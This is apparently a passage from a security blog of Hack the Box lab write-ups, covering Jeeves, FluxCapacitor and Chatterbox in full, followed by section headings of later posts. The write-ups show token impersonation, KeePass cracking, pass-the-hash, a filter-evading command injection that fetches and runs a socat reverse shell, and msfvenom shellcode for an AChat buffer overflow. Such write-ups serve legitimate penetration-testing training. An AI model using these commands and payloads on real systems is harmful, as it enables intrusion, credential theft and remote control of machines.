[*] uploaded   : /opt/serve/windows/priv/rottenpotato.exe -> rottenpotato.exe
meterpreter > getuid
Server username: JEEVES\kohsuke
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeImpersonatePrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
No tokens available

meterpreter > execute -cH -f rottenpotato.exe
Process 3620 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
JEEVES\kohsuke

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Method 2: Crack Keepass Database to Pass-the-hash

If you searched through the user kohsuke documents directory you would discover a file called CEH.kbdx. Normally the .kbdx file extension is associated with the KeePass Password Safe. If we can crack the password on this vault file, we will likely find credentials to potentially the local administrator account.

Downloading the Keepass Database file with meterpreter

meterpreter > cd Documents
meterpreter > dir
Listing: C:\Users\kohsuke\Documents
===================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  2846  fil   2017-09-18 13:43:17 -0400  CEH.kdbx
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Music
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Pictures
40777/rwxrwxrwx   0     dir   2017-11-03 22:50:40 -0400  My Videos
100666/rw-rw-rw-  402   fil   2017-11-03 23:15:51 -0400  desktop.ini

meterpreter > download CEH.kdbx
[*] Downloading: CEH.kdbx -> CEH.kdbx
[*] Downloaded 2.78 KiB of 2.78 KiB (100.0%): CEH.kdbx -> CEH.kdbx
[*] download   : CEH.kdbx -> CEH.kdbx
meterpreter >

verifying the downloaded file

root@dastinia:~/htb/jeeves# file CEH.kdbx
CEH.kdbx: Keepass password database 2.x KDBX

Before we can crack the CEH.kbdx we need to convert it to a format that either john or hashcat can understand. We can use the tool keepass2john (comes preinstalled on kali) to do this.

root@dastinia:~/htb/jeeves# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
root@dastinia:~/htb/jeeves# keepass2john CEH.kdbx > CEH.hash

cracking the hash & getting the password of the vault with john

root@dastinia:~/htb/jeeves# john --wordlist=/usr/share/wordlists/rockyou.txt CEH.hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:01:02 DONE (2018-05-16 23:54) 0.01601g/s 880.4p/s 880.4c/s 880.4C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We can then open this file with the Keepass utility, and the password we discovered with JTR.

Here are the contents that were contained in the keepass database file.

Password
12345
F7WhTrSFDKB6sxHU1cUn
pwndyouall!
lCEUnYPjNfIuPZSzOySA
S1TjAtJHKsugh9oC4VZl
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

We have a few passwords & and a hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 which happens to be an NTLM hash. The SMB Service (Port 445) is exposed on this server, so we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.

I’m a pretty big fan of CrackMapExec as a tool, and I use it pretty frequently for my real life work as well.

Some CME syntax: -p is for a list of passwords, and -H is for a list of hashes.

I used the --lusers flag to enumerate the logged on users just to validate that the credentials I used actually worked.

Shell with Metasploit PSEXEC Module & Hash

With a valid hash of the administrator account, we can perform a pass-the-hash attack & compromise the machine. I chose to use Metasploit for this, but there are plenty of tools which do the same thing as this module.

Getting SYSTEM shell with msf psexec

msf > use exploit/windows/smb/psexec
msf exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   RHOST                 10.10.10.63                                                        yes       The target address
   RPORT                 445                                                                yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                                                                      no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                     no        The service display name
   SERVICE_NAME                                                                             no        The service name
   SHARE                 ADMIN$                                                             yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                                  no        The Windows domain to use for authentication
   SMBPass               aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00  no        The password for the specified username
   SMBUser               Administrator                                                      no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.15.30      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic
   
msf exploit(windows/smb/psexec) > exploit -j -z
[*] Exploit running as background job 2.

[*] Started reverse TCP handler on 10.10.15.30:4444
[*] 10.10.10.63:445 - Connecting to the server...
[*] 10.10.10.63:445 - Authenticating to 10.10.10.63:445 as user 'Administrator'...
[*] 10.10.10.63:445 - Selecting PowerShell target
[*] 10.10.10.63:445 - Executing the payload...
[+] 10.10.10.63:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 10.10.10.63
[*] Meterpreter session 3 opened (10.10.15.30:4444 -> 10.10.10.63:49686) at 2018-05-17 00:18:23 -0400
msf exploit(windows/smb/psexec) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Getting the “Hidden” root.txt

meterpreter > cat hm.txt
The flag is elsewhere.  Look deeper

We drop into a regular shell, and run a dir /a which will show all files with the “hidden” attribute set.

C:\Users\Administrator\Desktop>dir /a

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   7,032,709,120 bytes free

dir /a will already show all of the hidden files on the system so likely the file is being hidden by another means.

In windows the only way you can really hide files is either by setting the hidden attribute with an attrib +h "whatever_thing_here" or through something called an Alternate Data Stream which is an NTFS specific thing.

To see files with an alternate data stream do a dir /R

C:\Users\Administrator\Desktop>dir /R

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,030,882,304 bytes free

That hm.txt:root.txt:$DATA means that the file root.txt is inside an alternate data stream inside hm.txt

You can see the contents of an ADS stream a few different ways but the simplist way in my opinion is using the more command on windows…

C:\Users\Administrator\Desktop>more < hm.txt:root.txt
...[FLAG REDACTED]...

Box Complete :)

References

https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password

http://www.labofapenetrationtester.com/2014/06/hacking-jenkins-servers.html

https://medium.com/@exgq/hacking-jenkins-68f7f6a810eb

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe

https://www.rubydevices.com.au/blog/how-to-hack-keepass

https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/

Hack the Box - FluxCapacitor Write up

2018-05-13T00:00:00-04:00

Intro

FluxCapacitor was both a pretty interesting, but annoying & the frustrating box while I was doing it my first time around – mainly due to my lack of experience with wfuzz. Overall once I finally completed the box, and completed a second take on it, flux taught me quite a few tricks, especially when it came to web fuzzing utilities. I highly recommend you take a crack at it if you have the time.

Tools Used

Nmap
wfuzz
cURL
socat

Initial Scanning

Let’s begin by scanning the machine FluxCapacitor at (10.10.10.69) with nmap.

root@dastinia:~/htb/fluxcapacitor# nmap -T4 -sC -sV -n 10.10.10.69 -oA fluxcapacitor_inital

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-09 18:50 EDT
Nmap scan report for 10.10.10.69
Host is up (0.18s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    SuperWAF
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 May 2018 22:50:46 GMT
......... [TRUNCATED]......

From our initial scan it seems as though the only service flux has is a web server. In the background, I’ll go ahead and run a full port scan to ensure I didn’t potentially miss any additional ports/services.

root@dastinia:~/htb/fluxcapacitor# nmap -T4 -sC -sV -n -p- 10.10.10.69 -oA fluxcapacitor_fullscan

Enumeration

Visiting the web server in our browser gives us a pretty bare site, and uneventful site.

Viewing the source of the site reveals some interesting information in a comment.

<!DOCTYPE html>
<html>
<head>
<title>Keep Alive</title>
</head>
<body>
	OK: node1 alive
	<!--
		Please, add timestamp with something like:
		<script> $.ajax({ type: "GET", url: '/sync' }); </script>
	-->
	<hr/>
	FluxCapacitor Inc. info@fluxcapacitor.htb - http://fluxcapacitor.htb<br>
	<em><met><doc><brown>Roads? Where we're going, we don't need roads.</brown></doc></met></em>
</body>
</html>

It seems that there is a route for a page located at /sync in this application, which potentially has to do something with time. Attempting to visit the /sync page in our browser automatically redirects us to a 403 Forbidden error message.

After attempting some research about openresty/1.13.6.1 I discovered that OpenResty from what I understood was a sort of web scriptable web server built on nginx.

I tried cURL’ing the page to see if there was any sort of “filtering” or content change based on what client you used to access the page.

root@dastinia:~# curl  http://10.10.10.69/sync
20180513T23:25:20

Awesome we see a timestamp – after a bit of fiddling around you discover that certain user agents are being filtered like the firefox & gobuster user agents.

Fuzzing /sync

We know that /sync is doing something underneath the hood, so the next step we can take is to try and fuzz for parameters & see how the application reacts, in the hopes of discovering additional functionality. We can use wfuzz tool to complete this task.

root@dastinia:~/htb/fluxcapacitor# wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.10.10.69/sync?FUZZ=echo

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.69/sync?FUZZ=hostname
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

000001:  C=200      2 L        1 W           19 Ch        "# directory-list-2.3-medium.txt"
000002:  C=200      2 L        1 W           19 Ch        "#"
000007:  C=200      2 L        1 W           19 Ch        "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000003:  C=200      2 L        1 W           19 Ch        "# Copyright 2007 James Fisher"
000004:  C=200      2 L        1 W           19 Ch        "#"
000005:  C=200      2 L        1 W           19 Ch        "# This work is licensed under the Creative Commons"
000006:  C=200      2 L        1 W           19 Ch        "# Attribution-Share Alike 3.0 License. To view a copy of this"
000008:  C=200      2 L        1 W           19 Ch        "# or send a letter to Creative Commons, 171 Second Street,"
000009:  C=200      2 L        1 W           19 Ch        "# Suite 300, San Francisco, California, 94105, USA."
000010:  C=200      2 L        1 W           19 Ch        "#"
000027:  C=200      2 L        1 W           19 Ch        "search"
000028:  C=200      2 L        1 W           19 Ch        "spacer"
000030:  C=200      2 L        1 W           19 Ch        "11"
000029:  C=200      2 L        1 W           19 Ch        "privacy"
000031:  C=200      2 L        1 W           19 Ch        "logo"
000032:  C=200      2 L        1 W           19 Ch        "blog"
000033:  C=200      2 L        1 W           19 Ch        "new"
000011:  C=200      2 L        1 W           19 Ch        "# Priority ordered case sensative list, where entries were found"
000034:  C=200      2 L        1 W           19 Ch        "10"
000035:  C=200      2 L        1 W           19 Ch        "cgi-bin"
000036:  C=200      2 L        1 W           19 Ch        "faq"
000037:  C=200      2 L        1 W           19 Ch        "rss"
000040:  C=200      2 L        1 W           19 Ch        "default"
000038:  C=200      2 L        1 W           19 Ch        "home"
000039:  C=200      2 L        1 W           19 Ch        "img"
000041:  C=200      2 L        1 W           19 Ch        "2005"
........[TRUNCATED]........

As we can see we are getting a large amount of 200 responses all of with length 19 characters. They are basically the time garbage responses so we can use this as the baseline of stuff to ignore/filter out, so anything different then the 200 or Char 19 is something we should potentially investigate further.

root@dastinia:~/htb/fluxcapacitor# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh=19 http://10.10.10.69/sync?FUZZ=echo

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.2.9 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.69/sync?FUZZ=echo
Total requests: 220560

==================================================================
ID      Response   Lines      Word         Chars          Payload
==================================================================

009874:  C=403      7 L       10 W          175 Ch        "opt"
010679:  C=200      2 L        1 W           19 Ch        "NAS"

Interesting we got a different response from our filter word which means that opt has a high change of being the parameter that /sync is looking for.

Side Note: This took some time, and looking back at it, I should have used a more tailored list like the Seclist Burp Parameter Names word list. Second time around doing this box it took less than two minutes to find the correct parameter. In the future, I should have done a bit more research into finding a bit more optimal list, doing so would have made this much easier.

After fiddling around with the formatting & trying a few different escape mechanisms (it would 403 if you just straight up gave it a command) code execution was successfully achieved.

Getting Code Execution

root@dastinia:~/htb/fluxcapacitor# curl "http://10.10.10.69/sync?opt='? \h\ostname'"
fluxcapacitor
bash: -c: option requires an argument

root@dastinia:~/htb/fluxcapacitor# curl "http://10.10.10.69/sync?opt='? \u\name -a'"
Linux fluxcapacitor 4.13.0-17-generic #20-Ubuntu SMP Mon Nov 6 10:04:08 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
bash: -c: option requires an argument

Getting User Shell

You very quickly find out that there’s a multitude of characters and words being filtered. The next objective is to get a reverse shell so we don’t have to keep interacting with it through cURL. Socat is my tool of choice. It’s so versatile if I have the opportunity to use it, I will….

Using forward slashes didn’t work particularly well with longer commands, so we are going to make the payload that we want the index.html of our python SimpleHTTPServer so that when we curl the page the command we want is what we see like so:

root@dastinia:~/htb/fluxcapacitor# curl "http://10.10.10.69/sync?opt='? c\u\rl 10.10.14.27:9999 '"
wget -q http://10.10.14.27:9999/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:8282
bash: -c: option requires an argument

root@dastinia:~/htb/fluxcapacitor# curl "http://10.10.10.69/sync?opt='? c\u\rl 10.10.14.27:9999 -o /tmp/a'"
bash: -c: option requires an argument
root@dastinia:~/htb/fluxcapacitor# curl "http://10.10.10.69/sync?opt='? b\a\s\h /tmp/a '"

root@dastinia:~/htb/fluxcapacitor# socat file:`tty`,raw,echo=0 tcp-listen:8282
nobody@fluxcapacitor:/$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
nobody@fluxcapacitor:/$

nobody@fluxcapacitor:/home/FluxCapacitorInc$ ls -la
total 12
drwxr-xr-x 2 nobody root 4096 Dec  5 14:58 .
drwxr-xr-x 4 root   root 4096 Dec  5 14:58 ..
-rw-r--r-- 1 root   root   33 Dec  5 14:58 user.txt
nobody@fluxcapacitor:/home/FluxCapacitorInc$ cat user.txt
[redacted]

Privesc & Getting Root

One of the first things I always do whenever I get on a box is running a sudo -l to see what sudo commands the current user can run. For a good set of boxes running this first can potentially save you a whole lot of time while privescing…

nobody@fluxcapacitor:/home/FluxCapacitorInc$ sudo -l
Matching Defaults entries for nobody on fluxcapacitor:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nobody may run the following commands on fluxcapacitor:
    (ALL) ALL
    (root) NOPASSWD: /home/themiddle/.monit

So in this case it looks like that we can run whatever /home/themiddle/.monit is as the root user. So this very likely is our path for privesc. Lets see what this file contains…

nobody@fluxcapacitor:/home/FluxCapacitorInc$ cd /home/themiddle/
nobody@fluxcapacitor:/home/themiddle$ cat .monit
#!/bin/bash

if [ "$1" == "cmd" ]; then
        echo "Trying to execute ${2}"
        CMD=$(echo -n ${2} | base64 -d)
        bash -c "$CMD"
fi

So from what it looks like .monit takes in a parameter cmd which you can then pass in a base64 encoded string of whatever you want (your command), then it base64 decodes the value & passes the result into bash -c $value. We can very easily use this script to get ourselves a root shell with little effort.

nobody@fluxcapacitor:/home/themiddle$ echo "/bin/bash" | base64
L2Jpbi9iYXNoCg==
nobody@fluxcapacitor:/home/themiddle$ sudo /home/themiddle/.monit cmd L2Jpbi9iYXNoCg==
Trying to execute L2Jpbi9iYXNoCg==

Root :D

root@fluxcapacitor:/home/themiddle# id
uid=0(root) gid=0(root) groups=0(root)
root@fluxcapacitor:/home/themiddle# cd /root
root@fluxcapacitor:~# cat root.txt
...[redacted]...

Hope this helped :D

Hack the Box - Chatterbox Write up

2018-05-13T00:00:00-04:00

Introduction

Tools Used.

Enumeration

Initial Scanning

Like with every box, lets start off with an nmap scan against the Chatterbox machine (10.10.10.74)…

root@dastinia:~/htb/chatterbox# nmap -T4 -sC -sV -n 10.10.10.74 -oA chatterbox_inital_scan
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 21:50 EDT
Stats: 0:01:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 45.00% done; ETC: 21:53 (0:01:28 remaining)
Stats: 0:01:16 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.00% done; ETC: 21:53 (0:01:25 remaining)Nmap scan report for 10.10.10.74Host is up (0.16s latency).
All 1000 scanned ports on 10.10.10.74 are filtered
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.17 seconds
root@dastinia:~/htb/chatterbox#

Interestingly enough, there were no ports alive… There might be some sort of filtering is taking place on the box, or it’s getting destroyed by other HTB users so I ran a slower full port scan against the box.

root@dastinia:~/htb/chatterbox# cat chatterbox_min_rate_500.nmap
# Nmap 7.70 scan initiated Tue May 22 22:12:31 2018 as: nmap -sC -sV -n -sT -p- --min-rate 500 -oA chatterbox_min_rate_500 10.10.10.74
Nmap scan report for 10.10.10.74
Host is up (0.16s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE    VERSION
9255/tcp open  mon?
9256/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 22 22:18:41 2018 -- 1 IP address (1 host up) scanned in 370.95 seconds

Interesting we are getting responses on two ports, but with no useful information as to what service is running on the port. I’m going to scan (yet again) to further enumerate what the service is. But this time we are going to run it at a T2 rate in case the firewall is dropping traffic due to speed.

root@dastinia:~/htb/chatterbox# nmap -T2  --max-retries 5 -sV -sC -p9255,9256 10.10.10.74 -oA chatterbox_p9255-9256_sc
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-22 22:34 EDT
Nmap scan report for 10.10.10.74
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.60 seconds

Enumerating Port 9255 (AChat Chat System httpd)

If you complete some research on “AChat” you discover a few CVE for the application, including a buffer overflow exploit for AChat version 0.150 beta7, which you can find on searchsploit/exploit-db.

After some quick googling, and looking at the AChat project’s sourceforge page you will discover that the last version of Achat to be released was AChat 0.150 beta7. So there’s a pretty high chance that this is version of the software running on Chatterbox.

Modifying Exploit ShellCode & Testing Locally

One of the first things I pay attention to is the architecture of the machine that this exploit was tested or developed for (in this case Windows 7 32bit),and what the POC exploit code is executing when it triggers. Usually the exploit developer will let you know what versions of “x” the following was tested as working on. For this exploit, the exploit developer generated shellcode to execute the calculator program when the exploit triggers. This is pretty useless to us, so we are going to drop-in-replace the exac/calc shellcode for simple reverse shell payload and go from there.

I downloaded a copy of the vulnerable AChat program, and ran it on a 64-bit Windows 7 virtual machine.

generating windows reverse shell shellcode with msfvenom

root@dastinia:~/htb/chatterbox# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp  LHOST=192.168.30.130 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 808 (iteration=0)
x86/unicode_mixed chosen with final size 808
Payload size: 808 bytes
Final size of python file: 3872 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x4b\x4c\x69\x58\x32\x62"
buf += "\x49\x70\x39\x70\x6d\x30\x4f\x70\x62\x69\x48\x65\x30"
buf += "\x31\x79\x30\x71\x54\x64\x4b\x52\x30\x6c\x70\x42\x6b"
...Snip....

After executing the modified exploit…

msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.30.130
LHOST => 192.168.30.130
msf exploit(multi/handler) > set LPORT 8282
LPORT => 8282
msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 1.

[*] Started reverse TCP handler on 192.168.30.130:8282

[*] Command shell session 2 opened (192.168.30.130:8282 -> 192.168.30.141:49389) at 2018-05-26 16:44:36 -0400
msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                                       Connection
  --  ----  ----               -----------                                                                       ----------
  1         shell x86/windows  Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  192.168.30.130:8282 -> 192.168.30.141:49388 (192.168.30.141)
  2         shell x86/windows                                                                                    192.168.30.130:8282 -> 192.168.30.141:49389 (192.168.30.141)


msf exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
win-ecc1ucer094\medic

Now we know that the exploit works & we can successfully get a shell. It may seem like overkill, but I feel like it’s good to understand what a potentially unknown exploit is doing on a local machine before you try exploiting something remotely. It will save tons of time trying to debug why x or y isn’t working, or in determining if the machine simply needs a reset because the service crashed, or there’s other strangeness taking place.

Getting Shell/Root.txt

So we know the exploit works, so let’s modify our msfvenom command to give us a reverse shell for our HTB IP.

root@dastinia:~# msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp  LHOST=10.10.15.226 LPORT=8282 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

after executing the modified exploit…

msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(multi/handler) >  set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 8282
LPORT => 8282
msf exploit(multi/handler) > set ExitOnSession False
ExitOnSession => false
msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 10.10.15.226:8282
msf exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 1 opened (10.10.15.226:8282 -> 10.10.10.74:49178) at 2018-06-14 21:55:43 -0400

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
chatterbox\alfred
C:\Users\Alfred\Desktop>type user.txt
[redacted]

There seemed to be a file permissions misconfiguration on the local administrators folder, and the root.txt file. I assumed this was the method we were supposed to take to get the root.txt flag. root.txt is owned by Alfred so we can use icacls to give full permissions on the root.txt file so we can read it.

getting root.txt by using icalcs to grant full permissions on the file

C:\Users\Administrator\Desktop>dir /Q
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Administrator\Desktop

12/10/2017  07:50 PM    <DIR>          BUILTIN\Administrators .
12/10/2017  07:50 PM    <DIR>          NT AUTHORITY\SYSTEM    ..
12/10/2017  07:50 PM                32 CHATTERBOX\Alfred      root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,758,883,840 bytes free

C:\Users\Administrator\Desktop>icacls.exe root.txt /grant CHATTERBOX\Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
[redacted]

dastinia

Hack the Box - Stratosphere Write up

Introduction

Tools Used

Enumeration

Enumerating Webservice - Port 80

Exploitation

Exploiting Apache Struts RCE with Struts-Pwn

Privilege Escalation

Root via Python Library Hijacking

Hack the Box - Celestial Write up

Introduction

Tools Used

Enumeration

Initial Scanning

Enumerating NodeJS - Port 3000

Exploitation

Privilege Escalation

Hack the Box - Silo Write up

Introduction

Tools Used

Enumeration

Initial Scanning

Enumeration

Enumerating IIS - Port 80

Enumerating Oracle DB - Port 1521

Exploitation

Analyzing Memory Dump with Volatility

Getting System

Getting Systemv2

Installing Oracle Database Attacking Tool (ODAT) on Kali Rolling (2018)

Overview

Requirements

Installation

Getting instaclient, sdk, and sqlplus

Installing ODAT (development version)

Hack the Box - Aragog Write up

Introduction

Enumeration

Initial Scanning

Enumerating FTP (test.txt)

Enumerating Port 80

Exploitation

Reading florian’s ssh private key

Privilege Escalation

Discovering dev_wiki wordpress site

Performing process monitoring with pspy

Backdooring Wordpress to Log Requests & Getting Root

Hack the Box - Bart Write up

Introduction

Tools Used

Enumeration

Initial Scanning

Enumeration Port 80 (forum.bart.htb (wordpress))

Discovering Monitoring Portal with Wfuzz

monitor.bart.htb

Exploitation

Simple Chat Source Code Discovery & Account Registration

Getting RCE through LFI & Log Poisoning

Privilege Escalation

Getting x64 meterpreter shell & impacket

